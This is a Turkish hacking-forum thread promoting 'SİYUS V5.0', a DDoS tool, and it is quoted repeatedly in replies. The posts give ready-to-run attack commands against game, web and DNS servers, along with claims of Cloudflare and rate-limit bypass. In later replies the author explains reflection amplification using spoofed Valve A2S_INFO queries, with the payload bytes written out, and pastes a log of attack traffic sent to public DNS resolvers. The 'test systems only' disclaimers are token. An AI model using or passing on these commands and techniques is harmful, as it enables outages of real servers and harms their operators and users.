[RELEASE] SİYUS V5.0 - Ultimate DDoS Framework (10K Thread, 5K+ Proxy, All Layer Attacks)

Katılım
10 Eyl 2021
Tepki puanı
362
Konum
Dünya
Rating - 0%
Merhaba SpyHackerz,

SİYUS V5.0 ile karşınızdayım. 10K thread, 5K+ proxy, tüm DDoS teknikleri!

⚡ ÖZELLİKLER:

· 10.000 max thread
· 5.000+ aktif proxy (150+ kaynak)
· 1.000+ User-Agent
· 15+ saldırı tekniği

🛡️ SALDIRI TEKNİKLERİ:

Kod:
· Layer 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
· Layer 4: SYN Flood, ACK Flood, UDP Flood, ICMP
· Amplification: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Mixed Attack (tüm teknikler)

🎮 OYUN SUNUCULARI İÇİN:

Kod:
```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000
Kod:
# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500
Kod:
# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000
Kod:
# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500
```

📈 TEST SONUÇLARI:

Kod:
· 5 dakikada 845K+ istek
· 1.25M+ paket
· 15.2GB veri
· Sunucu: CRASHED

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# CLI Modu
Kod:
./siyus.sh

# Direkt Saldırı
Kod:
./siyus.sh -a mixed -t "target.com" -d 300 --threads 4000
```

🖥️ CLI KOMUTLARI:

Kod:
```
> target http://hedef.com
> port 443
> attack http 300 5000
> attack mixed 180 10000
> stats
> proxies
> stop
```

🔧 SENARYOLAR:


# Web Sunucusu
Kod:
./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500

# Game Server
Kod:
./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &

# DNS Sunucusu
Kod:
./siyus.sh -a dns -t "dns.server" -d 240 --threads 1500
```

🛡️ GÜVENLİK:

Kod:
· Random User-Agent rotasyonu
· Proxy rotasyon (her 10 istekte)
· Cloudflare bypass
· Rate limit bypass
· IP blacklist bypass

⚠️ UYARILAR:

· SADECE test sistemlerinde kullanın
· Yasal izin olmadan ASLA kullanmayın
· Eğitim ve pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU

Gereksinimler: requests, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NOT: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

1000003729.jpg1000003688.png1000003687.png
 

Ekli dosyalar

  • 1000003689.png
    1000003689.png
    607.7 KB · Görüntüleme: 10
Katılım
2 Ara 2025
Tepki puanı
2
Rating - 0%
Merhaba SpyHackerz,

SİYUS V5.0 ile karşınızdayım. 10K thread, 5K+ proxy, tüm DDoS teknikleri!

⚡ ÖZELLİKLER:

· 10.000 max thread
· 5.000+ aktif proxy (150+ kaynak)
· 1.000+ User-Agent
· 15+ saldırı tekniği

🛡️ SALDIRI TEKNİKLERİ:

Kod:
· Layer 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
· Layer 4: SYN Flood, ACK Flood, UDP Flood, ICMP
· Amplification: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Mixed Attack (tüm teknikler)

🎮 OYUN SUNUCULARI İÇİN:

Kod:
```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000
Kod:
# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500
Kod:
# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000
Kod:
# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500
```

📈 TEST SONUÇLARI:

Kod:
· 5 dakikada 845K+ istek
· 1.25M+ paket
· 15.2GB veri
· Sunucu: CRASHED

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# CLI Modu
Kod:
./siyus.sh

# Direkt Saldırı
Kod:
./siyus.sh -a mixed -t "target.com" -d 300 --threads 4000
```

🖥️ CLI KOMUTLARI:

Kod:
```
> target http://hedef.com
> port 443
> attack http 300 5000
> attack mixed 180 10000
> stats
> proxies
> stop
```

🔧 SENARYOLAR:


# Web Sunucusu
Kod:
./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500

# Game Server
Kod:
./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &

# DNS Sunucusu
Kod:
./siyus.sh -a dns -t "dns.server" -d 240 --threads 1500
```

🛡️ GÜVENLİK:

Kod:
· Random User-Agent rotasyonu
· Proxy rotasyon (her 10 istekte)
· Cloudflare bypass
· Rate limit bypass
· IP blacklist bypass

⚠️ UYARILAR:

· SADECE test sistemlerinde kullanın
· Yasal izin olmadan ASLA kullanmayın
· Eğitim ve pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU


Gereksinimler: requests, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NOT: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

Ekli dosyayı görüntüle 45338Ekli dosyayı görüntüle 45336Ekli dosyayı görüntüle 45337
iyi kardes ama github linki patlamis o kotu oldu
 

cash 

🐉
Katılım
9 Nis 2021
Tepki puanı
975
Konum
Cloudflare
Rating - 100%
Merhaba SpyHackerz,

SİYUS V5.0 ile karşınızdayım. 10K thread, 5K+ proxy, tüm DDoS teknikleri!

⚡ ÖZELLİKLER:

· 10.000 max thread
· 5.000+ aktif proxy (150+ kaynak)
· 1.000+ User-Agent
· 15+ saldırı tekniği

🛡️ SALDIRI TEKNİKLERİ:

Kod:
· Layer 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
· Layer 4: SYN Flood, ACK Flood, UDP Flood, ICMP
· Amplification: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Mixed Attack (tüm teknikler)

🎮 OYUN SUNUCULARI İÇİN:

Kod:
```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000
Kod:
# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500
Kod:
# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000
Kod:
# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500
```

📈 TEST SONUÇLARI:

Kod:
· 5 dakikada 845K+ istek
· 1.25M+ paket
· 15.2GB veri
· Sunucu: CRASHED

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# CLI Modu
Kod:
./siyus.sh

# Direkt Saldırı
Kod:
./siyus.sh -a mixed -t "target.com" -d 300 --threads 4000
```

🖥️ CLI KOMUTLARI:

Kod:
```
> target http://hedef.com
> port 443
> attack http 300 5000
> attack mixed 180 10000
> stats
> proxies
> stop
```

🔧 SENARYOLAR:


# Web Sunucusu
Kod:
./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500

# Game Server
Kod:
./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &

# DNS Sunucusu
Kod:
./siyus.sh -a dns -t "dns.server" -d 240 --threads 1500
```

🛡️ GÜVENLİK:

Kod:
· Random User-Agent rotasyonu
· Proxy rotasyon (her 10 istekte)
· Cloudflare bypass
· Rate limit bypass
· IP blacklist bypass

⚠️ UYARILAR:

· SADECE test sistemlerinde kullanın
· Yasal izin olmadan ASLA kullanmayın
· Eğitim ve pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU


Gereksinimler: requests, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NOT: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

Ekli dosyayı görüntüle 45338Ekli dosyayı görüntüle 45336Ekli dosyayı görüntüle 45337
Hocam anlamadım şimdi ne bir valve hex ne de fivem paketi var içinde nasıl bu sunuculara vuruyor açıklama yapar mısın inceledim kodu bulamadım
 
Katılım
6 Şub 2020
Tepki puanı
3
Rating - 0%
Olá SpyHackerz,

SİYUS V5.0 ile karşınızdayım. Thread de 10K, proxy de 5K+, todas as técnicas de DDoS!

⚡ ÖZELLİKLER:

• 10.000 threads no máximo
· Mais de 5.000 proxy ativo (mais de 150 kaynak)
• Mais de 1.000 agentes de usuário
· 15+ saldırı tekniği

🛡️ TÉCNICAS DE SALDIRI:

[CÓDIGO]· Camada 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
• Camada 4: Inundação SYN, Inundação ACK, Inundação UDP, ICMP
• Amplificação: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Ataque Misto (tüm teknikler)[/CODE]

🎮 OYUN SUNUCULARI İÇİN:

[CÓDIGO]```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000[/CODE]
[CÓDIGO]# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500[/CODE]
[CÓDIGO]# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000[/CODE]
[CÓDIGO]# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500[/CODE]
```

📈 RESULTADOS DOS TESTE:

[CÓDIGO]· 5 dias 845K+ istek
• Mais de 1,25 milhão de pacotes
• 15,2 GB veri
· Sunucu: TRAVOU[/CODE]

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# Modo CLI
[CÓDIGO]./siyus.sh[/CÓDIGO]

# Direkt Saldırı
[CÓDIGO]./siyus.sh -a misto -t "target.com" -d 300 --threads 4000
```[/CÓDIGO]

🖥️ CLI KOMUTLARI:

[CÓDIGO]```
> alvo http://hedef.com
> porta 443
> ataque http 300 5000
> ataque misto 180 10000
> estatísticas
> proxies
> parar
```[/CÓDIGO]

🔧 SENARYOLAR:


# Web Sunucusu
[CÓDIGO]./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500[/CÓDIGO]

# Servidor de jogos
[CÓDIGO]./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &[/CODE]

# DNS Sunucusu
[CÓDIGO]./siyus.sh -a dns -t "servidor.dns" -d 240 --threads 1500
```[/CÓDIGO]

🛡️ GÜVENLİK:

Kod:
· Rotas aleatórias de agente de usuário
· Rotas de proxy (seus 10 istekte)
• Ignorar o Cloudflare
• Ignorar limite de taxa
· Ignorar lista negra de IP

⚠️ UYARILAR:

· Teste do sistema de teste SADECE
· Yasal izin olmadan ASLA kullanmayın
· Eğitim e pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU

[OBRIGADO]*** Texto oculto: não pode ser citado. ***
[/OCULTAR OBRIGADO]
Gereksinimler: solicitações, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NÃO: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

Ekli dosyayı görüntüle 45338Ekli dosyayı görüntüle 45336Ekli dosyayı görüntüle 45337
ugu
 
Katılım
17 Ocak 2026
Tepki puanı
0
Rating - 0%
Merhaba SpyHackerz,

SİYUS V5.0 ile karşınızdayım. 10K thread, 5K+ proxy, tüm DDoS teknikleri!

⚡ ÖZELLİKLER:

· 10.000 max thread
· 5.000+ aktif proxy (150+ kaynak)
· 1.000+ User-Agent
· 15+ saldırı tekniği

🛡️ SALDIRI TEKNİKLERİ:

Kod:
· Layer 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
· Layer 4: SYN Flood, ACK Flood, UDP Flood, ICMP
· Amplification: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Mixed Attack (tüm teknikler)

🎮 OYUN SUNUCULARI İÇİN:

Kod:
```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000
Kod:
# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500
Kod:
# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000
Kod:
# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500
```

📈 TEST SONUÇLARI:

Kod:
· 5 dakikada 845K+ istek
· 1.25M+ paket
· 15.2GB veri
· Sunucu: CRASHED

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# CLI Modu
Kod:
./siyus.sh

# Direkt Saldırı
Kod:
./siyus.sh -a mixed -t "target.com" -d 300 --threads 4000
```

🖥️ CLI KOMUTLARI:

Kod:
```
> target http://hedef.com
> port 443
> attack http 300 5000
> attack mixed 180 10000
> stats
> proxies
> stop
```

🔧 SENARYOLAR:


# Web Sunucusu
Kod:
./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500

# Game Server
Kod:
./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &

# DNS Sunucusu
Kod:
./siyus.sh -a dns -t "dns.server" -d 240 --threads 1500
```

🛡️ GÜVENLİK:

Kod:
· Random User-Agent rotasyonu
· Proxy rotasyon (her 10 istekte)
· Cloudflare bypass
· Rate limit bypass
· IP blacklist bypass

⚠️ UYARILAR:

· SADECE test sistemlerinde kullanın
· Yasal izin olmadan ASLA kullanmayın
· Eğitim ve pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU


Gereksinimler: requests, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NOT: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

Ekli dosyayı görüntüle 45338Ekli dosyayı görüntüle 45336Ekli dosyayı görüntüle 45337
Wow
 
Katılım
10 Eyl 2021
Tepki puanı
362
Konum
Dünya
Rating - 0%
Hocam anlamadım şimdi ne bir valve hex ne de fivem paketi var içinde nasıl bu sunuculara vuruyor açıklama yapar mısın inceledim kodu bulamadim
Kankam haklısın, mantık şu:

Küçük paket gönderiyoruz: Valve sunucusuna 56 byte'lık A2S_INFO sorgusu gönderiyoruz.
· Paket: \xFF\xFF\xFF\xFFTSource Engine Query\x00 (25-56 byte)
Valve büyük yanıt veriyor: valve sunucusu bu küçük sorguya 1400-1500 byte'lık server bilgisiyle yanıt veriyor. IP Spoofing yapıyoruz: Gönderdiğimiz paketin kaynak IP'sini HEDEF'in IP'si yapıyoruz. Valve'ın yanıtı spoofed IP'ye (hedefe) gidiyor.
Amplification oranı: 56 byte 1450 byte 26x büyütme

MATEMATİĞİ ne dersen Senin sunucu: 500 Mbit (62.5 MB/s) çıkış Gönderdiğin: 62.5 MB/s × 56 byte
Valve'ın gönderdiği: 62.5 MB/s × 1450 byte = 90.6 MB/s Amplification: 90.6 / 3.5 = 25.9x

SONUÇ:
500 Mbit gönderirsen, hedef 500 Mbit × 25.9 = 12.95 Gbit alıyor. Yansitmada Bu yüzden 10Gbit hat yiyor ve sunucu bunu kaldıramıyor.


Attack detail : 10Kpps/1Mbps
dateTime srcIp:srcPort dstIp:dstPort protocol
2026.01.14 16:50:58 CET 57.128.166.221:59428 209.244.0.38:53 UDP --- 124 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:57158 94.247.43.40:53 UDP --- 105 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53815 192.71.245.9:53 UDP --- 106 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53478 8.20.247.3:53 UDP --- 170 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:48024 84.200.69.34:53 UDP --- 190 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:48279 45.90.28.16:53 UDP --- 110 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:57937 199.85.126.29:53 UDP --- 146 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:59920 109.69.8.39:53 UDP --- 129 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:39297 208.67.220.17:53 UDP --- 155 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53226 185.184.222.35:53 UDP --- 128 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:36544 8.8.8.34:53 UDP --- 178 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:38416 185.184.222.23:53 UDP --- 124 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43620 84.200.70.34:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53219 45.90.28.4:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43337 194.242.2.6:53 UDP --- 128 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:40726 74.82.42.18:53 UDP --- 155 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43328 149.112.112.18:53 UDP --- 138 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:42606 77.88.8.22:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:36223 185.228.169.7:53 UDP --- 129 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:34181 89.233.43.9:53 UDP --- 98 ATTACK:DNS**
 
Katılım
10 Eyl 2021
Tepki puanı
362
Konum
Dünya
Rating - 0%
string:
Kankam haklısın, mantık şu:

Küçük paket gönderiyoruz: Valve sunucusuna 56 byte'lık A2S_INFO sorgusu gönderiyoruz.
· Paket: \xFF\xFF\xFF\xFFTSource Engine Query\x00 (25-56 byte)
Valve büyük yanıt veriyor: valve sunucusu bu küçük sorguya 1400-1500 byte'lık server bilgisiyle yanıt veriyor. IP Spoofing yapıyoruz: Gönderdiğimiz paketin kaynak IP'sini HEDEF'in IP'si yapıyoruz. Valve'ın yanıtı spoofed IP'ye (hedefe) gidiyor.
Amplification oranı: 56 byte 1450 byte 26x büyütme

MATEMATİĞİ ne dersen Senin sunucu: 500 Mbit (62.5 MB/s) çıkış Gönderdiğin: 62.5 MB/s × 56 byte
Valve'ın gönderdiği: 62.5 MB/s × 1450 byte = 90.6 MB/s Amplification: 90.6 / 3.5 = 25.9x

SONUÇ:
500 Mbit gönderirsen, hedef 500 Mbit × 25.9 = 12.95 Gbit alıyor. Yansitmada Bu yüzden 10Gbit hat yiyor ve sunucu bunu kaldıramıyor.


Attack detail : 10Kpps/1Mbps
dateTime srcIp:srcPort dstIp:dstPort protocol
2026.01.14 16:50:58 CET 57.128.166.221:59428 209.244.0.38:53 UDP --- 124 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:57158 94.247.43.40:53 UDP --- 105 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53815 192.71.245.9:53 UDP --- 106 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53478 8.20.247.3:53 UDP --- 170 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:48024 84.200.69.34:53 UDP --- 190 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:48279 45.90.28.16:53 UDP --- 110 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:57937 199.85.126.29:53 UDP --- 146 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:59920 109.69.8.39:53 UDP --- 129 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:39297 208.67.220.17:53 UDP --- 155 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53226 185.184.222.35:53 UDP --- 128 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:36544 8.8.8.34:53 UDP --- 178 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:38416 185.184.222.23:53 UDP --- 124 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43620 84.200.70.34:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:53219 45.90.28.4:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43337 194.242.2.6:53 UDP --- 128 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:40726 74.82.42.18:53 UDP --- 155 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:43328 149.112.112.18:53 UDP --- 138 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:42606 77.88.8.22:53 UDP --- 94 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:36223 185.228.169.7:53 UDP --- 129 ATTACK:DNS
2026.01.14 16:50:58 CET 57.128.166.221:34181 89.233.43.9:53 UDP --- 98 ATTACK:DNS**
String
b"\xFF\xFF\xFF\xFF" + b"T" + b
 
Katılım
26 Şub 2026
Tepki puanı
0
Rating - 0%
Merhaba SpyHackerz,

SİYUS V5.0 ile karşınızdayım. 10K thread, 5K+ proxy, tüm DDoS teknikleri!

⚡ ÖZELLİKLER:

· 10.000 max thread
· 5.000+ aktif proxy (150+ kaynak)
· 1.000+ User-Agent
· 15+ saldırı tekniği

🛡️ SALDIRI TEKNİKLERİ:

Kod:
· Layer 7: HTTP Flood, Slowloris, GoldenEye, HTTP/2, SSL
· Layer 4: SYN Flood, ACK Flood, UDP Flood, ICMP
· Amplification: DNS, NTP, SSDP, Memcached, CHARGEN
· Özel: Mixed Attack (tüm teknikler)

🎮 OYUN SUNUCULARI İÇİN:

Kod:
```bash
# CS:GO/Steam
./siyus.sh -a udp -t "server.com" -p 27015 -d 180 --threads 3000
Kod:
# Minecraft
./siyus.sh -a syn -t "mc.server" -p 25565 -d 240 --threads 2500
Kod:
# Rust
./siyus.sh -a mixed -t "rust.server" -p 28015 -d 300 --threads 5000
Kod:
# FiveM
./siyus.sh -a mixed -t "fivem.server" -p 30120 -d 240 --threads 3500
```

📈 TEST SONUÇLARI:

Kod:
· 5 dakikada 845K+ istek
· 1.25M+ paket
· 15.2GB veri
· Sunucu: CRASHED

🚀 KULLANIM:


# Kurulum
Kod:
pip3 install requests fake-useragent dnspython pysocks

# CLI Modu
Kod:
./siyus.sh

# Direkt Saldırı
Kod:
./siyus.sh -a mixed -t "target.com" -d 300 --threads 4000
```

🖥️ CLI KOMUTLARI:

Kod:
```
> target http://hedef.com
> port 443
> attack http 300 5000
> attack mixed 180 10000
> stats
> proxies
> stop
```

🔧 SENARYOLAR:


# Web Sunucusu
Kod:
./siyus.sh -a slowloris -t "web.server" -p 80 -d 600 --threads 500

# Game Server
Kod:
./siyus.sh -a udp -t "game.server" -p 27015 -d 180 --threads 3000 &
./siyus.sh -a syn -t "game.server" -p 27015 -d 180 --threads 2000 &

# DNS Sunucusu
Kod:
./siyus.sh -a dns -t "dns.server" -d 240 --threads 1500
```

🛡️ GÜVENLİK:

Kod:
· Random User-Agent rotasyonu
· Proxy rotasyon (her 10 istekte)
· Cloudflare bypass
· Rate limit bypass
· IP blacklist bypass

⚠️ UYARILAR:

· SADECE test sistemlerinde kullanın
· Yasal izin olmadan ASLA kullanmayın
· Eğitim ve pentest amaçlıdır
· Sorumluluk kullanıcıya aittir

💾 SCRIPT KODU


Gereksinimler: requests, fake-useragent, dnspython, pysocks

📞 DESTEK: Konu altına yazabilirsiniz.

❗ NOT: Bu araç sadece güvenlik testleri için geliştirilmiştir. Kötüye kullanım kullanıya aittir.

Ekli dosyayı görüntüle 45338Ekli dosyayı görüntüle 45336Ekli dosyayı görüntüle 45337
THX
 
131,446Konular
3,268,219Mesajlar
315,149Kullanıcılar
metin 123Son Üye
Üst Alt